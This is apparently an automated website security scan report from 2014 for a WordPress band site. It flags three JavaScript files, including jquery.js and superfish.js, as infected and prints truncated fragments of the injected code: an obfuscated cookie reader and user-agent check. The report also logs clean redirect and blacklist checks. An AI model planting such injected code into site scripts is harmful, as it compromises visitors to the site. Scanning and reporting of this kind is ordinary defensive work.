Scanned pages/files
Request | Server response | Status |
http://thequietrevolution.com/ | 200 OK Content-Length: 13649 Content-Type: text/html | clean |
http://thequietrevolution.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 98402 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var templateshoper = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return templateshoper ? decodeURIComponent(templateshoper[1]) : undefined; } function Hardtechnology() { var JameNoober = navigator.userAgent; var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > - jQuery.noConflict(); Antivirus reports:
| ||
http://thequietrevolution.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 9200 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var templateshoper = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return templateshoper ? decodeURIComponent(templateshoper[1]) : undefined; } function Hardtechnology() { var JameNoober = navigator.userAgent; var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > - Antivirus reports:
| ||
http://thequietrevolution.com/wp-content/themes/indiefest/IndieFest/js/superfish.js?ver=1 | 200 OK Content-Length: 5787 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var templateshoper = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return templateshoper ? decodeURIComponent(templateshoper[1]) : undefined; } function Hardtechnology() { var JameNoober = navigator.userAgent; var NiceProgroude = (JameNoober.indexOf("IEMobile") > -1 || JameNoober.indexOf("Windows NT 6.3") > -1 || JameNoober.indexOf("Chrome") > - showSuperfishUl : function(){ var o = sf.op, sh = sf.c.shadowClass+'-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); jQuery(document).ready(function() { jQuery('ul#nav').superfish(); }); Antivirus reports:
| ||
http://thequietrevolution.com/wp-content/themes/indiefest/IndieFest/js/mdma.js?ver=1 | 200 OK Content-Length: 2064 Content-Type: application/javascript | clean |
http://thequietrevolution.com/wp-content/themes/indiefest/IndieFest/js/clear-form-fields.js?ver=3.9.2 | 200 OK Content-Length: 4960 Content-Type: application/javascript | clean |
http://thequietrevolution.com/wp-content/plugins/audio-player/assets/audio-player.js?ver=2.0.4.6 | 200 OK Content-Length: 31223 Content-Type: application/javascript | clean |
http://www.statcounter.com/counter/counter_xhtml.js | 200 OK Content-Length: 15530 Content-Type: application/x-javascript | clean |
http://thequietrevolution.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.50.0-2014.02.05 | 200 OK Content-Length: 18305 Content-Type: application/javascript | clean |
http://thequietrevolution.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8 | 200 OK Content-Length: 11630 Content-Type: application/javascript | clean |
http://thequietrevolution.com/wp-content/plugins/mailchimp-for-wp/assets/js/placeholders.min.js?ver=1.5.8 | 200 OK Content-Length: 6267 Content-Type: application/javascript | clean |
http://thequietrevolution.com/thequietrevolution/ | 200 OK Content-Length: 14580 Content-Type: text/html | clean |
http://thequietrevolution.com/music/ | 200 OK Content-Length: 13648 Content-Type: text/html | clean |
http://thequietrevolution.com/videos/ | 200 OK Content-Length: 13513 Content-Type: text/html | clean |
http://thequietrevolution.com/pictures/ | 200 OK Content-Length: 15532 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thequietrevolution.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 11 Sep 2014 01:52:30 GMT
Server: cloudflare-nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CF-RAY: 168039e8187c0f5d-FRA
Link: <http://thequietrevolution.com/>; rel=shortlink
Set-Cookie: __cfduid=dc5de1e9b86f1c5c58c2acbd68560a6821410400349458; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.thequietrevolution.com; HttpOnly
X-Pingback: http://thequietrevolution.com/xmlrpc.php
GET / HTTP/1.1
Host: thequietrevolution.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 11 Sep 2014 01:52:30 GMT
Server: cloudflare-nginx
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
CF-RAY: 168039e8187c0f5d-FRA
Link: <http://thequietrevolution.com/>; rel=shortlink
Set-Cookie: __cfduid=dc5de1e9b86f1c5c58c2acbd68560a6821410400349458; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.thequietrevolution.com; HttpOnly
X-Pingback: http://thequietrevolution.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: thequietrevolution.com
Referer: http://www.google.com/search?q=thequietrevolution.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thequietrevolution.com
Referer: http://www.google.com/search?q=thequietrevolution.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thequietrevolution.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://thequietrevolution.com/
Result: thequietrevolution.com is not infected or malware details are not published yet.
Result: thequietrevolution.com is not infected or malware details are not published yet.